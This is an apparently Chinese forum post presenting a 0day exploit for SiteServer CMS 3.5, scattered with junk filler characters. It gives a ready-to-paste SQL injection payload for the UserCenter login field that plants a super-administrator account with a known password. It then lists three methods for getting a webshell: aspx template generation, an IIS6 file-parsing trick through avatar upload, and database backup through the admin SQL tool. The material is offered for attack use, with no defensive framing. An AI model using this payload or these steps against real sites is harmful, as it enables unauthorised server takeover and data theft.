SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版

. E! G' Z2 g8 E+ ?stieserver官网:www.siteserver.cn
/ u  x+ Y5 G3 H6 N; F. a

' H. n1 b! ~: J9 K; b
+ y; i$ Q4 F* F$ r& n5 Z  HEXP:
, w! e' l& l/ }7 Z( B3 P, C
直接访问UserCenter/login.aspx



用户名处输入：
7 w# K3 b* k" u( U
3 L2 Z. \, W7 u) \2 r123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--

4 `1 Z. k' ~( @# Q
3 h  j. H- |, U
密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。

8 t+ G6 v  n/ ?' H
- o9 Y/ I9 Z. L
6 M; y8 v2 }4 W' T3 ^1 G之后再访问后台SiteServer/login.aspx用插入的用户登陆

7 Y+ B2 H' m6 V# ?

) ^9 r* b4 M  `% w后台拿webshell的三种方法：
% x. \/ ^2 z! K6 \( ^3 [
  D* u( a! l9 U0 o+ K5 a" O1 n6 u2 y一、
$ U8 p' Z" P& j0 {# t* y" S
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
8 ^/ [: o$ _5 W# H% ?: C0 l
二、
% o6 h8 W& ?4 G. w
$ }& R  w$ h2 g0 O) e成员权限-》添加用户-》用户名为：1.asp

1 n) X2 {; \" ~" u# s7 V5 r. K. F+ K7 Mhttp://127.0.0.1/usercenter/

用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell
" _9 X7 W: Z% I. p2 q) B& H) P
（ps：后台添加用户时不会验证是否含有非法字符）
+ J' v1 l. H, W6 N2 e/ b! Y$ ]
三、
7 N6 {, L3 C" R; h
* j& {# h6 u" @, G1 g系统工具-》实用工具-》机器参数查看
: ?2 e2 f# s$ ^& D5 s, t# N4 j/ }可以看到数据库类型、名称，WEB路径

系统工具-》数据库工具-》SQL语句查询
这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。